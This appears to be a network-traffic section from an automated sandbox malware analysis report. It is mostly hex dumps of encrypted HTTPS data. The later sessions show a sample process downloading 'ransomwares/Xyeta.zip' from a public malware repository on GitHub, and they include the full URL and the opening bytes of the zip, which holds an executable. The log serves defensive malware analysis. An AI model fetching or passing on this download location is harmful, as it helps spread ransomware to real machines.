                                                                                                                                                            2022-09-29 12:44:59 UTC7317INData Raw: 9c ed 7b 3f 16 62 74 02 b8 5c 52 85 27 8c a9 30 2e cb cb c8 0a d0 f9 34 58 ea 34 14 f2 24 0b 55 14 3c a3 31 c2 56 18 dc d6 45 30 e0 85 2b cf f6 10 00 8e 20 00 1e 1a 19 b9 52 c8 4b 22 11 e0 3b 3f c5 3c 83 16 cf de b5 ef 60 d6 f7 f9 4f da 54 98 d3 42 43 f2 8f 45 ce d4 4f 0a 5d 2e 95 51 d2 b8 71 ea af c2 db a4 86 29 13 a2 25 90 b5 aa 4c 3e c5 9a 08 df da 63 c8 a3 82 7f 01 b6 f7 cb c8 35 14 9c e1 ff 89 f5 1d 3b 57 8b 33 04 8f fc e8 50 61 f2 37 44 60 2d b2 a0 4a db 6d 3b 55 99 6e 47 b6 6b f9 d2 72 8a 55 03 41 20 63 7f b7 6d 9d fb 3c 7d 54 3c f5 1b 5b bd 95 a9 74 8c f5 7a 29 3d 81 eb 74 bf dc d8 8b ac 49 5e dc fd 23 bb d4 02 50 cb 80 ff 6c e9 92 9f 26 c4 d3 82 f9 58 18 ea be 49 cd e9 12 69 b5 18 6e 1d 81 f5 a5 9d 92 b5 17 91 db 1a 43 20 98 df c6 50 f6 6f 03 69
                                                                                                                                                            Data Ascii: {?bt\R'0.4X4$U<1VE0+ RK";?<`OTBCEO].Qq)%L>c5;W3Pa7D`-Jm;UnGkrUA cm<}T<[tz)=tI^#Pl&XIinC Poi
                                                                                                                                                            2022-09-29 12:44:59 UTC7333INData Raw: 0e 6f b0 fe 95 5a 13 e7 b9 cf 93 65 27 b1 82 18 60 3e 75 61 73 5f 8e 63 a4 fd e0 05 02 81 c7 02 85 7e d8 b8 c4 81 e9 c4 9f fb dc e1 45 7d 5d ad 73 4c 5e 1a 47 2d 5c 72 13 26 90 c0 7d 1a 7b bc a6 04 ba 7a a1 d3 be 8f 88 2e b9 0d 0d 9d a5 74 de 14 3a 2a b5 2e cb 9f 25 e0 e8 54 ab a9 10 a5 f1 99 e8 58 22 00 4f 5f 5f 66 77 d6 ea da 80 01 bb 0e 55 8e 31 9b fc 93 79 11 3e 86 80 bb 08 5f 5d 72 50 fb 71 9e 5d be 60 69 f6 98 96 e2 d7 8c f4 4a be 04 54 c3 17 b5 0c cf 47 a4 20 e0 e7 12 dd a5 b3 d3 da 5b 76 c4 c4 81 32 2a c6 41 95 a5 87 7a b7 bd f8 c7 11 62 4b 96 47 81 14 66 fa 7d 9d cb 60 6b 62 06 8f 21 05 d3 50 6a a0 6b c8 7f 6d 6a d7 4d 41 7a 53 53 d6 e8 14 97 77 f3 fe d7 95 1e 99 be 37 95 7c 83 a4 71 42 d5 50 b6 c6 c1 0b 9a 66 9f 74 81 60 12 51 9a e8 05 64 16 95
                                                                                                                                                            Data Ascii: oZe'`>uas_c~E}]sL^G-\r&}{z.t:*.%TX"O__fwU1y>_]rPq]`iJTG [v2*AzbKGf}`kb!PjkmjMAzSSw7|qBPft`Qd
                                                                                                                                                            2022-09-29 12:44:59 UTC7349INData Raw: 63 b2 d5 f8 4f 41 9a 86 2f 87 b0 46 f4 ba 91 94 f6 d8 ef 6c a3 67 be e5 b6 0e 41 60 64 b1 0e 56 7c e9 9e ff 9b 87 20 e4 5e 91 76 5a bc 13 00 81 90 2a 56 f4 32 a3 d2 6e b9 c0 95 c5 00 87 ff b2 b5 22 6b 09 8d 91 5f 87 60 f1 41 6c 88 a7 e9 e9 55 89 4d 22 04 9b 1e 00 58 22 ce b1 96 4c cf 92 4a 09 1a a0 0b 1a 8d d3 cd b0 a4 bc 4a 89 5e 75 83 85 e3 ff c5 fc 7b 78 ae 7b dc 4a 4a 91 7b f7 a7 c8 c0 18 8b 5b 05 90 ff 90 bf 06 d9 7d ce bb 58 c2 11 ed c0 46 1c 46 ff 03 4e cd 26 d0 33 b0 55 38 db b6 35 04 f7 a2 73 d6 d2 57 36 c5 7c 7a 10 24 29 52 ac 7c 03 03 29 c0 19 c3 ca 6d da 5b fc 83 6e f7 23 7e 63 f1 5a 60 3f d6 4d 27 dc 8d 32 eb f0 ca 77 bf d9 a0 38 d9 49 fa 08 eb 05 83 81 28 37 24 d5 86 03 a0 a1 59 2d 54 53 a0 61 a8 d2 dc 2a cb 9d da 1c 0d ad 87 a1 e2 6a 9b fb
                                                                                                                                                            Data Ascii: cOA/FlgA`dV| ^vZ*V2n"k_`AlUM"X"LJJ^u{x{JJ{[}XFFN&3U85sW6|z$)R|)m[n#~cZ`?M'2w8I(7$Y-TSa*j
                                                                                                                                                            2022-09-29 12:44:59 UTC7365INData Raw: 96 f3 5e 9e 20 78 32 70 ca 26 e5 c2 0a 52 b9 91 b1 08 8d 1a 30 fb 96 e8 70 85 32 a9 8b a6 9c 12 87 9e 26 23 d2 2f be e7 9a 28 92 71 d3 c8 b7 3c 4e 79 32 c8 ff 8d 62 af f6 77 64 66 a1 2d ec 61 ac a3 3c dd ea 4c 07 b1 50 05 cd a9 7b 5f b1 e5 f3 83 dd 4e 45 1d af 97 95 21 f7 48 b7 15 16 34 10 ae b7 8c 84 0f d3 9e b3 49 63 5a 55 f6 91 91 1e dc f1 4a 3d ed 61 a8 dc d6 82 20 33 ff c9 5d 25 a2 e5 69 bb 56 72 a4 b3 29 0f 0c 2e 10 33 f1 1a 28 c8 96 97 8d 33 74 8e 3c e5 d9 5a 7c a7 02 c3 36 49 b3 9e af 65 73 59 ba a3 77 9d e3 81 47 eb 5f f0 0d ab ea 79 a7 0d 2f 23 24 61 fb a9 d2 92 7d c8 e7 87 f9 60 8a b3 00 7c 50 5b 2d 23 37 fe 83 34 4f 9a d8 7b e1 18 68 13 a2 16 ae 61 67 22 e1 d2 56 cb 18 33 70 01 53 31 c4 f3 5c a0 e0 8b 03 7a 2b 73 5d d1 3f bf d6 0d 8a 98 38 a1
                                                                                                                                                            Data Ascii: ^ x2p&R0p2&#/(q<Ny2bwdf-a<LP{_NE!H4IcZUJ=a 3]%iVr).3(3t<Z|6IesYwG_y/#$a}`|P[-#74O{hag"V3pS1\z+s]?8
                                                                                                                                                            2022-09-29 12:44:59 UTC7381INData Raw: c2 af 5a c7 58 2b a1 cf ba e2 f8 4e cc 2e 95 a4 74 de 48 18 33 bc 8b 8f cb 3f 00 d5 18 01 e5 61 08 d9 db 56 96 aa 8a 67 47 85 94 32 5f 17 d8 70 03 ec 2f c6 28 fa e0 72 e9 67 3f 54 de 3c 23 42 36 20 6d 9c c8 22 c5 7e 57 de 6a b6 52 5d d8 7d 31 e5 48 61 e8 cc b1 ef fb f9 2f 74 26 45 46 7b 8d 1a d6 88 3c 92 c1 5b e3 6f 67 8a d9 a8 28 ae 2f fa bc e0 05 67 a7 1f 9a f0 84 53 34 dd 29 42 c3 49 5a 56 79 91 7e f0 33 68 04 2c 9e ce 91 0e 80 99 f7 d4 a1 b1 c0 b1 bd ba 70 6f 9d f3 30 5a 31 32 58 df 30 1b 68 0b 9b ff 1e 18 a2 de 3b 03 99 2e 59 ff 90 b7 97 9c 24 08 80 bb 38 2e 69 e8 2e 79 d8 42 32 4b 97 e5 8d c6 5e 89 bc 45 ee 70 35 6d 98 e8 6e f4 f6 69 74 9b 3d 3c ce 9d d2 d9 6f 0d 88 a2 3e d5 cf 77 77 d7 53 a2 23 d2 d2 46 74 fc 4e 7d 08 1f ae 19 b4 41 e4 fe 17 8d 82
                                                                                                                                                            Data Ascii: ZX+N.tH3?aVgG2_p/(rg?T<#B6 m"~WjR]}1Ha/t&EF{<[og(/gS4)BIZVy~3h,po0Z12X0h;.Y$8.i.yB2K^Ep5mnit=<o>wwS#FtN}A
                                                                                                                                                            2022-09-29 12:44:59 UTC7397INData Raw: cf 16 8f 11 0e 05 9d cb 5b 88 4c dc 7d c5 d9 91 f9 ff d6 1d 9d b3 3d 4f 8d 30 58 aa a3 eb 63 41 dd 41 4f c7 47 42 95 42 49 f5 af b2 3d a1 1c f2 04 a1 68 21 e8 75 47 79 13 4a 40 6f 12 1b ab 49 a9 84 c4 11 b7 fd 8d 6d be 8b 62 e3 c1 22 ac 6e 22 db df f1 21 54 1e b3 5c 65 36 7d 53 71 75 23 ef 74 96 a2 8f ba 8b f4 81 e6 26 2f 7c 5d 6a 68 1a a0 f8 bf 0f 0a ed 71 b7 4f b6 22 55 48 73 59 66 1d 9d 71 bb 18 26 17 eb a4 78 65 55 07 7b 01 85 00 07 39 ea 92 25 af 28 23 41 97 30 37 41 bb 0b 19 ea e7 c9 70 3c c3 28 97 e8 0d 95 43 68 a9 c8 54 ff 5d 51 8b 7f 45 b2 e1 58 27 97 43 ab 7b aa 82 b8 bd df 07 f6 68 2b 85 47 76 4f 31 17 4e 46 7d 18 bc 48 d8 c6 18 50 49 aa 71 9e fc 8d 79 2d e6 67 e1 c5 d0 66 bb 1e ab b5 fd cd 82 8d f1 f0 da 98 54 22 60 dd 1a 4d 53 14 1b 2c 65 4c
                                                                                                                                                            Data Ascii: [L}=O0XcAAOGBBI=h!uGyJ@oImb"n"!T\e6}Squ#t&/|]jhqO"UHsYfq&xeU{9%(#A07Ap<(ChT]QEX'C{h+GvO1NF}HPIqy-gfT"`MS,eL
                                                                                                                                                            2022-09-29 12:44:59 UTC7413INData Raw: 31 3a 4c 87 d6 6c a9 0a 19 de 25 af f0 00 af 8b b4 86 a1 6f fe 9f 82 08 68 9f ed f8 b0 ab d2 ff 5d 29 59 37 60 f0 09 51 a0 5f be 98 09 1b 55 fc 37 8a 72 8e 3a 60 ca cc 03 9c dc 06 36 ea 06 df e5 ab af 99 36 89 e2 53 2c bb af c3 1c 0e 38 0b 1f 40 3d a2 07 0a 3e bf 5a 21 21 5d 0d 69 2c 54 97 1e 02 b4 11 94 8b 26 85 ac 3e 5a 4f b3 9a 76 dd 89 c8 b6 ef c4 53 d6 3c f4 b8 13 0b 12 a4 aa 37 d8 92 a6 b7 4f 54 43 47 88 1f a1 d1 95 1e d5 a9 96 46 0b 2b 4e bd cd da 50 fa c5 46 61 59 ba 1e db 85 d5 d6 ae 5a be 48 20 bd 2d 64 f1 87 60 33 93 60 b7 8b 08 a3 15 0d e2 14 4f f9 c5 48 44 ba 55 02 7c a8 09 f0 3a 67 ec a2 44 49 53 62 19 00 e1 34 ea a4 57 ac ac c8 89 00 4b 6d 93 bb 5c ad 86 da 08 f4 2a 8a 68 b6 51 67 ae 57 0b ca c7 b6 70 7b 49 cd 15 8e a6 02 c4 69 d4 71 60 93
                                                                                                                                                            Data Ascii: 1:Ll%oh])Y7`Q_U7r:`66S,8@=>Z!!]i,T&>ZOvS<7OTCGF+NPFaYZH -d`3`OHDU|:gDISb4WKm\*hQgWp{Iiq`
                                                                                                                                                            2022-09-29 12:44:59 UTC7429INData Raw: 02 8a aa 67 8c 69 20 e4 2f 3b aa 71 cc 70 fc aa a3 dc 95 68 1f 75 9d 30 fa 12 4f 6e 9e 86 89 40 a8 b8 9e d7 fc 0d 3e d1 e7 0a 65 fa ba 7a dc 7a 80 92 13 30 f5 69 43 05 b9 0a 5b c9 42 8d 22 9c e6 5d 54 19 36 04 f3 f2 43 ce c8 11 2c ce 7b 51 42 2e a7 ca 1a 35 64 5a 42 48 f9 bb 90 01 00 0d a3 f0 63 56 66 dd 30 82 ea 9f 7b 74 17 c4 80 59 a9 6b 81 9c 40 33 a7 1c c2 d5 20 4a ef e2 a0 ba d4 9a 4b 63 f5 67 8e 4a 8a 00 25 ef 44 bb e0 86 d7 81 17 29 54 b7 eb 80 d5 4c f8 f8 cc 5c 16 95 81 0e 8d af 1e 07 c5 8e 89 e9 c2 83 a1 19 e0 16 0b 49 a4 12 e3 c1 83 aa ea 9f 14 a8 2f 63 dd 74 47 97 cc 85 54 dd 09 93 88 ef 42 4a f0 34 03 d8 1c 3b 02 7f ed 48 3d 8d c8 ca 73 39 cb 3a dd ac a4 2e c1 6a 50 9f 0e 9b 17 de 44 a4 dd 81 4e 0a 5f af cf e6 f8 6e ce 4e fd a6 60 d0 da de d1
                                                                                                                                                            Data Ascii: gi /;qphu0On@>ezz0iC[B"]T6C,{QB.5dZBHcVf0{tYk@3 JKcgJ%D)TL\I/ctGTBJ4;H=s9:.jPDN_nN`
                                                                                                                                                            2022-09-29 12:44:59 UTC7445INData Raw: 6b f9 1e dd 3a 52 d6 5c 4a 9b 81 8f bf d9 19 33 d6 cb 42 19 a5 de eb 72 ae 2a f0 99 bc 1a 64 87 6b 82 10 dc b5 cb 1a 76 ba 00 3d 52 17 12 0b b0 25 2a 44 52 15 76 eb a0 de ca 22 d4 4c b4 ed 36 b2 0b 0a 6d b5 c3 14 34 3b a2 1b bd e2 0b d6 c9 6e 24 1f 51 cb 10 27 1f f3 c8 65 5b 9c 16 31 6c 67 0a a5 34 59 28 bd 6e ae 0c 7c 66 da 2c b9 d0 93 a1 eb b6 8c f5 cc 70 c5 12 0d e2 76 5a 4d 27 25 9e bc 15 2b a9 bc dc 37 d1 da 0c da c1 4e 4f 05 15 07 93 12 c4 81 75 ca f2 73 8a 48 ed 3f 95 cf 5b 79 3c db b4 ff 77 8e 8e 72 48 00 a5 40 af 62 0a 5e 69 5b 9a 39 da 50 4a 57 5b 95 ff e5 e6 07 29 e6 9e d9 d7 ed e5 bf 73 b0 f4 65 72 67 c3 91 85 8f 03 65 77 c9 7b ed 92 38 7f c7 d9 bc d2 05 5d 5d ca cd ea ab d4 ef 68 9c 74 6d 8e 3a 52 1b 9b 9a ec f7 a6 f6 ca 00 d1 60 48 dd ad 3a
                                                                                                                                                            Data Ascii: k:R\J3Br*dkv=R%*DRv"L6m4;n$Q'e[1lg4Y(n|f,pvZM'%+7NOusH?[y<wrH@b^i[9PJW[)sergew{8]]htm:R`H:
                                                                                                                                                            2022-09-29 12:44:59 UTC7461INData Raw: 56 bd e5 a5 7a 73 15 11 19 e4 01 e8 25 2b 9e f0 57 53 49 fd ab 87 c0 a6 67 2f 73 14 e0 d7 60 40 9f 09 c1 bf ec b6 89 26 11 a5 50 c6 d6 07 30 20 b0 b4 b4 46 c8 aa 39 b2 3b 5e 06 17 96 a5 cd 2d 1e 47 83 2d 29 7e 7a 06 57 10 32 66 d3 c2 e4 51 cb d1 34 c5 7b db 1a 7c a9 90 03 5a 9a 43 ec 75 c7 12 76 13 48 54 91 ca c6 5c 84 42 38 26 8e 4b d6 06 d6 34 e7 61 12 05 03 7e 0e a5 cc 4b bc 58 e5 dd 23 53 08 55 23 20 40 d3 dc 74 cf b4 c0 6e 8f 71 88 a7 15 a8 fb a0 5d 16 15 6a e4 bb f1 98 23 81 35 dd af 2b 8d 45 41 c1 2c 38 3a 1d 6e dd 52 a8 34 b5 66 f0 95 3b fa f6 26 c4 3d 07 24 28 14 f1 78 c6 da d5 3a 38 93 ac 33 d6 16 2e 9d 0c 86 f8 fa 48 60 47 1d 0f 78 d8 de ed 07 02 5f 4d f0 a1 11 25 0e 30 8d ec ca 9b 77 77 04 0e 4a 34 33 c3 e3 50 e1 db cb 52 59 6c 8c a7 a4 f1 ee
                                                                                                                                                            Data Ascii: Vzs%+WSIg/s`@&P0 F9;^-G-)~zW2fQ4{|ZCuvHT\B8&K4a~KX#SU# @tnq]j#5+EA,8:nR4f;&=$(x:83.H`Gx_M%0wwJ43PRYl
                                                                                                                                                            2022-09-29 12:44:59 UTC7477INData Raw: 40 43 77 c0 cb fb 4c e5 70 d2 c1 11 78 b2 a9 e1 24 83 85 93 58 19 8d 63 d0 97 87 33 23 b7 0f c4 fa 3a 0f 1f fa 95 7b f2 d9 ab 76 42 45 76 6d db 40 bc bf 7e 9a 3d f0 e6 64 52 59 5d 41 54 4a 0b 82 b0 2b 25 ff 82 7a 55 23 3a 3b 01 4e 1b f3 6f f4 6b 3a b4 d4 d6 8d f4 10 c6 7e 2e 53 17 7c dd d9 61 15 8c c3 35 54 a5 cd 44 89 df 6a 9f 1f 2b 32 a5 af 66 e8 28 2f 30 02 ef 07 d8 d0 5d a0 67 89 3a 21 5e 65 98 bf 85 aa 32 7e 8c 69 13 46 b4 04 54 64 bf db 0a 2c 3e 80 51 27 41 81 90 09 d5 79 35 5d 44 a4 56 04 0f f7 b4 76 0a 3a 49 92 d2 ec 4e d0 c7 19 d4 e5 a5 f6 28 10 6c 2b 5c 41 a3 c7 c1 0a 20 c1 c1 ca 4e 13 49 95 29 2b ce 40 29 88 54 a5 d8 6c 7c 19 30 ad 37 09 ac 81 8a 43 f7 e7 f6 e4 d8 f0 6f 50 1b 31 72 40 ec 08 0d 3a 22 99 d2 32 4b 41 b4 a1 e9 69 ff 71 30 9f 88 33
                                                                                                                                                            Data Ascii: @CwLpx$Xc3#:{vBEvm@~=dRY]ATJ+%zU#:;Nok:~.S|a5TDj+2f(/0]g:!^e2~iFTd,>Q'Ay5]DVv:IN(l+\A NI)+@)Tl|07CoP1r@:"2KAiq03
                                                                                                                                                            2022-09-29 12:44:59 UTC7493INData Raw: 5b 2a 2b bd 73 a5 39 0e b4 4d e0 96 28 c2 00 2c 4e 8d c8 d4 31 13 f1 46 96 1d 8d 13 f8 ac d9 71 aa 01 32 48 1a 49 7f e3 6b 6c 3a 5c 6d d4 59 b2 93 d0 25 46 12 c6 df 6a 77 ff d7 dd 5a 6f 22 c3 35 d4 65 0a f4 ef 8f de 7b 21 d0 0a 4b 84 a8 c3 36 b7 2e 27 d2 a0 4c a5 a1 13 36 87 b9 51 fd 53 ff f6 dd 60 a9 39 48 c9 ea 2a 6e 10 bd a5 3f 21 f2 d5 0c 9b 1b a7 2a 57 7c 63 fe b1 4a ca 8c 3b f2 83 b2 59 e3 ab 27 af 4c f9 82 9a 3e ba 96 b0 ae 8d 0b e6 ff 23 e7 71 14 6c 8c f0 71 38 71 7a bd 43 02 2b 15 33 c8 53 71 c4 f9 24 24 d5 c5 f6 f0 db f5 f8 b3 de bb db b2 9d 4f c1 d5 38 bd 34 f5 dd 13 46 0b 42 b4 95 c0 24 1f f9 09 13 24 78 ca 42 af 14 fe 63 5e c4 a2 ba 10 0b a4 1a ee 52 ed 7c 9e d3 08 91 9d 81 a4 7a 89 4b 43 83 66 71 c8 50 7e 0f bb c5 7d c1 d7 cf 94 cb c3 c0 58
                                                                                                                                                            Data Ascii: [*+s9M(,N1Fq2HIkl:\mY%FjwZo"5e{!K6.'L6QS`9H*n?!*W|cJ;Y'L>#qlq8qzC+3Sq$$O84FB$$xBc^R|zKCfqP~}X
                                                                                                                                                            2022-09-29 12:44:59 UTC7509INData Raw: 59 84 c3 a7 f2 5b 87 0e da a7 8a a8 31 91 29 51 f3 60 d5 2f 50 1c d0 cd ac e1 cd 1d 59 3d 85 e7 fc cb f1 09 a9 fc 58 6c 1b 48 9e ed ce 0a 5b 31 fd 6b 42 61 7c 7a f9 13 28 de d1 e8 16 3f 33 ac 58 ea db fd 5b a6 8e 0e 84 22 01 f8 f7 58 46 9b d1 f6 1f ae 9a db e6 85 61 01 e5 cc dd 41 70 0f 24 c3 3c 6c 05 1c 35 58 75 3a ee ec ff cd 7f 4f fe 1a 14 38 d4 74 09 c6 c8 3c 06 0f 00 03 44 9c 52 66 78 f5 07 9e 98 18 81 1c 4c a4 62 65 7b 3f 65 1c 32 ca 26 13 00 03 5d 5c 0b 92 66 8e 8b aa da de a4 83 b9 98 20 9a 34 14 1f 2d 1b ed bc 9f ce 1c 62 98 4a 86 c3 52 2a e6 a2 0d db 93 28 00 0a 04 fd cc af 52 04 d6 8d 24 6e ac c5 f3 a5 64 06 f0 7a 55 88 2d 61 89 13 04 86 d2 e2 df e4 e1 91 27 da 0a dc 30 e1 4f ab 8d 58 c7 95 66 4f 8c 19 b6 ac eb c4 d9 f7 9d 8a 47 8a e1 0e 00 31
                                                                                                                                                            Data Ascii: Y[1)Q`/PY=XlH[1kBa|z(?3X["XFaAp$<l5Xu:O8t<DRfxLbe{?e2&]\f 4-bJR*(R$ndzU-a'0OXfOG1


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            54192.168.2.649735140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:00 UTC7521OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            55140.82.121.4443192.168.2.649735C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:01 UTC7521INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:19 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:01 UTC7522INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            56192.168.2.649736185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:01 UTC7523OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            57185.199.110.133443192.168.2.649736C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:01 UTC7523INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 77102
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "3aa8e4e319c7c273c5d9fc9071b3c14c66404cc71f0c3bd72a0137f90c54bbe3"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: BC80:0543:E4C491:F3028B:6335934D
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:01 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6934-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455501.123433,VS0,VE197
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 48788a4b1915deffce380184eacf4cdd94cb5a8f
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:01 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:01 UTC7524INData Raw: 50 4b 03 04 14 00 01 00 08 00 3b 0c 3d 3e 89 23 ff 7d 80 2c 01 00 00 50 01 00 14 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 58 79 65 74 61 2e 65 78 65 e0 56 04 74 2a 4a 9d b0 12 3a 4b 00 4a 15 97 da eb db 90 28 9e 54 ae ce 0c 86 03 d2 18 7f a9 7a 76 ec 1d b8 f3 06 2b 6a 51 00 b5 73 d8 81 6c 15 ae 27 4f 5a 02 f3 35 ad 61 07 63 7d 2e 8e 3e f1 f3 2b 88 4d e4 5c 81 c5 e4 b7 17 43 2c 63 ab 0f c5 a0 45 17 4c 36 40 6d 6c a0 44 f5 2f 82 26 57 0e b1 66 5e bd c6 8b 13 60 9e 97 dc 8a 06 8b 1f fa 02 54 b6 25 08 75 90 c3 c0 98 58 ae 9e d6 1e c7 c4 25 e8 17 46 ff a0 69 e6 e7 16 27 10 46 8b 84 04 12 ca 52 2d 8c 38 bf 39 66 3a d3 ec fe ff ee 80 c3 64 f1 c7 e2 47 64 d1 42 02 f1 2f de a4 13 00 26 67 12 63 bb 54 97 c0 50 23 d8 5d a0 3e 77 7f 89 26 53 5c 7f 69 13 62 13 98 e6
                                                                                                                                                            Data Ascii: PK;=>#},PEndermanch@Xyeta.exeVt*J:KJ(Tzv+jQsl'OZ5ac}.>+M\C,cEL6@mlD/&Wf^`T%uX%Fi'FR-89f:dGdB/&gcTP#]>w&S\ib
                                                                                                                                                            2022-09-29 12:45:01 UTC7526INData Raw: 83 57 89 ed 4b aa 09 90 16 7e b6 e5 79 0b 4f 61 87 92 06 55 ed ce a3 f3 03 5f 8c 6e b2 31 a0 02 70 eb fc 13 5c 82 8f cb a3 7d 82 e9 73 29 47 56 cb 7c 7d b8 ee b4 47 16 35 b5 e9 29 d6 06 65 c5 50 8b 65 3f 4c ee e9 62 7a 44 17 13 7b 9d bb 0c d4 39 a4 fd 1f c0 ae 88 f0 6d ae 06 cb e5 72 86 7a 9d a6 be 72 a2 35 b3 8d 62 51 74 ba 41 39 a3 db aa 1a e5 23 bd 8f 61 bd 55 6c 28 fb c3 12 3c 91 5a e4 bd e9 85 57 f2 9e a8 cf 6a 01 61 8c 78 f0 ea 6c f0 eb 99 eb fa 1d a1 9d 6b 60 00 ad f0 58 f1 a7 55 04 a8 ec cc 45 cf 41 af ed 3a 54 28 b2 b6 80 00 f8 f6 cb a9 c0 f0 4e 9e e6 4f b2 a2 3a b8 e1 58 90 a6 7b 22 2a e3 c4 d4 b6 d9 b0 99 42 a3 49 b4 75 65 63 19 ac 98 2f f6 a2 eb 55 e0 49 d1 50 ce 43 60 5a 97 e4 b9 a1 7d bb 6f 12 c1 9f 93 43 e9 ba d5 c8 4c 2d be 27 7b b0 4d b5
                                                                                                                                                            Data Ascii: WK~yOaU_n1p\}s)GV|}G5)ePe?LbzD{9mrzr5bQtA9#aUl(<ZWjaxlk`XUEA:T(NO:X{"*BIuec/UIPC`Z}oCL-'{M
                                                                                                                                                            2022-09-29 12:45:01 UTC7527INData Raw: 93 ef 83 97 4d 06 85 7b 85 5c 2a 19 d3 78 b1 42 ee cf 1f 21 d2 40 09 25 ac 9d 04 46 ee d3 5e 48 a5 a9 a6 6c 57 7a c5 eb 42 14 f3 df 5e 3c b9 37 28 00 bd 7e d8 ac a0 81 64 2b c1 2b db 8c 2b 3f 4b d8 9d 4f 5b 18 9f 0b f2 f7 67 f5 c8 ff 1c 5f f8 32 13 a0 fa a8 ac 01 0e c7 08 a9 3e 78 de 7b 16 ce 7c bb 0d 9d f7 c6 91 99 d5 5a fd 15 c3 09 1b 32 40 98 6b 2f 4d 82 16 59 7d 06 6c 7c 99 7f 30 88 86 95 83 7d cd f9 a9 e9 b9 d4 20 ad 3c a9 87 82 ba 61 20 63 9e 83 74 1e a3 9b 3b b7 f0 79 fd 9a 30 bc 17 e1 0f 3a 8c d5 4e b7 1f a2 88 45 04 2c 7b 21 92 3f 22 8d 3b 94 88 33 68 d3 54 df 39 53 bb bf 2f ba 2b ec 1b 44 61 01 1a 47 90 08 13 ab bd 02 4b 25 ee 0e 18 a3 9b 00 02 7e 96 9a a7 3c 96 3e 48 32 ae 38 4a bc 15 0b 4a f0 46 ac d6 a2 e1 39 d8 fa ea 81 a6 f8 4b 28 9a 93 ce
                                                                                                                                                            Data Ascii: M{\*xB!@%F^HlWzB^<7(~d+++?KO[g_2>x{|Z2@k/MY}l|0} <a ct;y0:NE,{!?";3hT9S/+DaGK%~<>H28JJF9K(
